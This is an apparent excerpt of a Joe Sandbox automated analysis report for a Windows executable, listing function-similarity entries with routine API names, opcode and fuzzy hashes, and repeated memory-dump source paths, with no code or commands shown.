                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo_noreturn$ErrorLastLoadString$Concurrency::cancel_current_taskInit_thread_footer
                          • String ID: %ls$%s: %s
                          • API String ID: 2539828978-2259941744
                          • Opcode ID: b94a3b4d4ee99872e46ecaca9b73eb32f2d8f4e98bb6d8a8cc0fe3901ec98d03
                          • Instruction ID: 0d6a948cb1ced2e28a659465c196abe007e90d4440cf0e810d0bd00bb974e6a5
                          • Opcode Fuzzy Hash: b94a3b4d4ee99872e46ecaca9b73eb32f2d8f4e98bb6d8a8cc0fe3901ec98d03
                          • Instruction Fuzzy Hash: 9DB29862A58A8281FA10BB25FC551BBE351FFD67B0F904236E69D436E6EF2CD148D310
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfomemcpy_s
                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                          • API String ID: 1759834784-2761157908
                          • Opcode ID: c1568b5568d689d261f1f0b975b9c1104ab10acfc5286cd5346a40821ab4f9bc
                          • Instruction ID: 280cdb419c202fb5661ed8aa630e3aee89766abc3f674475b67dd3bb57ee09d5
                          • Opcode Fuzzy Hash: c1568b5568d689d261f1f0b975b9c1104ab10acfc5286cd5346a40821ab4f9bc
                          • Instruction Fuzzy Hash: 0EB20973E089824AF725AE6DEC406FEE7B1FB45398F805135DA0957B88DF38E5089B10
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: NamePath$File_invalid_parameter_noinfo_noreturn$LongMoveShort$CompareCreateString
                          • String ID: rtmp
                          • API String ID: 3587137053-870060881
                          • Opcode ID: 9a6b4eb23280b2374bd97dfab45b851d954896022b1567a2b07181d6df3ed98a
                          • Instruction ID: 9a45f02f2464f13098236120cd6c57206e1981f836950d5577e8cd85e75a6dfd
                          • Opcode Fuzzy Hash: 9a6b4eb23280b2374bd97dfab45b851d954896022b1567a2b07181d6df3ed98a
                          • Instruction Fuzzy Hash: 89F1B262A08E4281FB10EB75EC411BFA762EB857A4FA00135EB4D43AA9DF3CD58DD750
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: FullNamePath_invalid_parameter_noinfo_noreturn
                          • String ID:
                          • API String ID: 1693479884-0
                          • Opcode ID: f4aab3d6a38d3a7c87b22c38f8e02ebac67e4094d45f76237e24e5c31d843a01
                          • Instruction ID: 1e45f86d84b91e7431ab0a0577532200e51b878d71027d56e1b567aae2221bca
                          • Opcode Fuzzy Hash: f4aab3d6a38d3a7c87b22c38f8e02ebac67e4094d45f76237e24e5c31d843a01
                          • Instruction Fuzzy Hash: 75A1B462F14E5185FE00EB79AC841BEA362AF45BB4BA44235DE2E17BC9DF3CD0859210
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                          • String ID:
                          • API String ID: 3140674995-0
                          • Opcode ID: eb4060bcbbf6947450414bc0ac192b8da1feec02df413969c5a674799d26ef14
                          • Instruction ID: 460d73abdfb3c69aa018142757f685cd57cc51332460b997286d6806efca6dfd
                          • Opcode Fuzzy Hash: eb4060bcbbf6947450414bc0ac192b8da1feec02df413969c5a674799d26ef14
                          • Instruction Fuzzy Hash: B8314F72608F818AFBA0AF65EC503EAB370FB44754F84403ADA4D47A88EF38D548D710
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                          • String ID:
                          • API String ID: 1239891234-0
                          • Opcode ID: 5940ef1d6d2c32beaf7af9e8e0892e721e3d30544378453b8f42f9f5775f8da8
                          • Instruction ID: 56890a3472740dcfd94012637e7913c2d9f5b5c8104119af5ea2178914085777
                          • Opcode Fuzzy Hash: 5940ef1d6d2c32beaf7af9e8e0892e721e3d30544378453b8f42f9f5775f8da8
                          • Instruction Fuzzy Hash: F6315032608F8186E760DF25FC402AEB3A4FB85764F940135EA8D43B99EF38D559D710
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo_noreturn
                          • String ID:
                          • API String ID: 3668304517-0
                          • Opcode ID: de64f728d12beaa22573aa5c8c3373be7786903fe8bc75938e9b5cbc412359fd
                          • Instruction ID: 4208e671b6c7645fb4088235fd14a81fa6f0c6d85268dc42436d3565586b6c34
                          • Opcode Fuzzy Hash: de64f728d12beaa22573aa5c8c3373be7786903fe8bc75938e9b5cbc412359fd
                          • Instruction Fuzzy Hash: D0B1CDA2B14E8685FA10AB75EC452EEE361FB857A4F804231EA4C03B99EF3CD548D310
                          APIs
                          • _invalid_parameter_noinfo.LIBCMT ref: 00007FF71614FAC4
                            • Part of subcall function 00007FF716147934: GetCurrentProcess.KERNEL32(00007FF716150CCD), ref: 00007FF716147961
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: CurrentProcess_invalid_parameter_noinfo
                          • String ID: *?$.
                          • API String ID: 2518042432-3972193922
                          • Opcode ID: f96344909874f118cd7fc652812aee2de17a0b901a5c412331694f6fbd6e8fc4
                          • Instruction ID: bf313ac47c3d6317bb55cdf96b3b576ce68207ace33f7adea141d00feb772546
                          • Opcode Fuzzy Hash: f96344909874f118cd7fc652812aee2de17a0b901a5c412331694f6fbd6e8fc4
                          • Instruction Fuzzy Hash: 2051B372B15E9545FF10EFA5AC144BAA3A4FB88BE8B848531DE1D17B85EF3CD04A9310
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: memcpy_s
                          • String ID:
                          • API String ID: 1502251526-0
                          • Opcode ID: b531b63a04a12e36dec63d06dc2411054f876835da8b044adf2bb9f605172619
                          • Instruction ID: 93b69a97faa0f7a3fe51b65ee56b4457865275da0472d001caa45f9f86c06f9d
                          • Opcode Fuzzy Hash: b531b63a04a12e36dec63d06dc2411054f876835da8b044adf2bb9f605172619
                          • Instruction Fuzzy Hash: 00D1E333B1868287EB64DF19F5846AAF7A1F789794F548134EB4E53B48CA3CE845DB00
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: ErrorFormatFreeLastLocalMessage
                          • String ID:
                          • API String ID: 1365068426-0
                          • Opcode ID: c27e05edbcf0c556cf9f4b9f4aa6354f64d9dc72ff0f252d3a2ededa039666af
                          • Instruction ID: db4f9c9d5cdf15e260752c885b3c468fd0e1109229e36adbfab7b1879dfe799c
                          • Opcode Fuzzy Hash: c27e05edbcf0c556cf9f4b9f4aa6354f64d9dc72ff0f252d3a2ededa039666af
                          • Instruction Fuzzy Hash: 6E01E175608B4182E750AF26BC5017BE365BB897D0F844035DA8D87B49DF3CD5499710
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID:
                          • String ID: .
                          • API String ID: 0-248832578
                          • Opcode ID: 7c9d8364e7b62915daf92aecf888b4814fe01b6aae5fc02ec6e7aa2f3019df5b
                          • Instruction ID: 7c34ed7efab7c753a89e19addd9e0a139963984a9c756fa140b4a4fd6518cf32
                          • Opcode Fuzzy Hash: 7c9d8364e7b62915daf92aecf888b4814fe01b6aae5fc02ec6e7aa2f3019df5b
                          • Instruction Fuzzy Hash: 25310C32B08E9149F720AA2ABC087BBEA91AB95BF4F548235DE5C07BC5DF3CD5059300
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: ExceptionRaise_clrfp
                          • String ID:
                          • API String ID: 15204871-0
                          • Opcode ID: 131550a8e914c8a4384a7255cc8ec53066b4dff0b7ecc1394be8dfb6b4310eca
                          • Instruction ID: 139fb7323e0e070efec14b0f271ac3096c5c82e74ebaf73845ff0921db2f41d1
                          • Opcode Fuzzy Hash: 131550a8e914c8a4384a7255cc8ec53066b4dff0b7ecc1394be8dfb6b4310eca
                          • Instruction Fuzzy Hash: 40B1AB33600B888BEB19DF2DD84636DBBB0F741BA8F188821DA5D837A8CB39D455D710
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: ObjectRelease$CapsDevice
                          • String ID:
                          • API String ID: 1061551593-0
                          • Opcode ID: 68dbe16693602acb82a0a9c061fd0d735b77194d41f4ab9e90264308bb487059
                          • Instruction ID: 234105c436c62c0a43d804db8f8d706277d049ee7625f085b90d85b8bd92f18f
                          • Opcode Fuzzy Hash: 68dbe16693602acb82a0a9c061fd0d735b77194d41f4ab9e90264308bb487059
                          • Instruction Fuzzy Hash: D2815932B18E1586FB50DB6AE8406AEB771FB88BA8F414132CE4E57728DF38D548D350
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: FormatInfoLocaleNumber
                          • String ID:
                          • API String ID: 2169056816-0
                          • Opcode ID: a0c8fcaef59427837b2a7c7753e3d717a8442860a15e47712294eddcbb527c28
                          • Instruction ID: efa2218d86b6fd22bf5e3ad30cfd5a83898ea5374646b979af5e20974ef363f3
                          • Opcode Fuzzy Hash: a0c8fcaef59427837b2a7c7753e3d717a8442860a15e47712294eddcbb527c28
                          • Instruction Fuzzy Hash: 5C114A26A08B8195F661AB21F8003EAB360FF88BA8FC54135DA4D07658EF3CD559D754
                          APIs
                            • Part of subcall function 00007FF7161224C0: CreateFileW.KERNELBASE ref: 00007FF71612259B
                            • Part of subcall function 00007FF7161224C0: GetLastError.KERNEL32 ref: 00007FF7161225AE
                            • Part of subcall function 00007FF7161224C0: CreateFileW.KERNEL32 ref: 00007FF71612260E
                            • Part of subcall function 00007FF7161224C0: GetLastError.KERNEL32 ref: 00007FF716122617
                          • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7161215D0
                            • Part of subcall function 00007FF716123980: MoveFileW.KERNEL32 ref: 00007FF7161239BD
                            • Part of subcall function 00007FF716123980: MoveFileW.KERNEL32 ref: 00007FF716123A34
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: File$CreateErrorLastMove$_invalid_parameter_noinfo_noreturn
                          • String ID:
                          • API String ID: 34527147-0
                          • Opcode ID: 1488c1936801c91a2cee98249e7db5a0996b073c688c31523c97a3bef9f1bd63
                          • Instruction ID: 021723c725c1415ff8d8c0e38c4d0b83e473ccf98c61ad815a5287a8e4bf7a9b
                          • Opcode Fuzzy Hash: 1488c1936801c91a2cee98249e7db5a0996b073c688c31523c97a3bef9f1bd63
                          • Instruction Fuzzy Hash: 0191C366B18E4682FA10EB62E8452AFA362FB45BE4F904036EF0D47B95DF3CD549D310
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
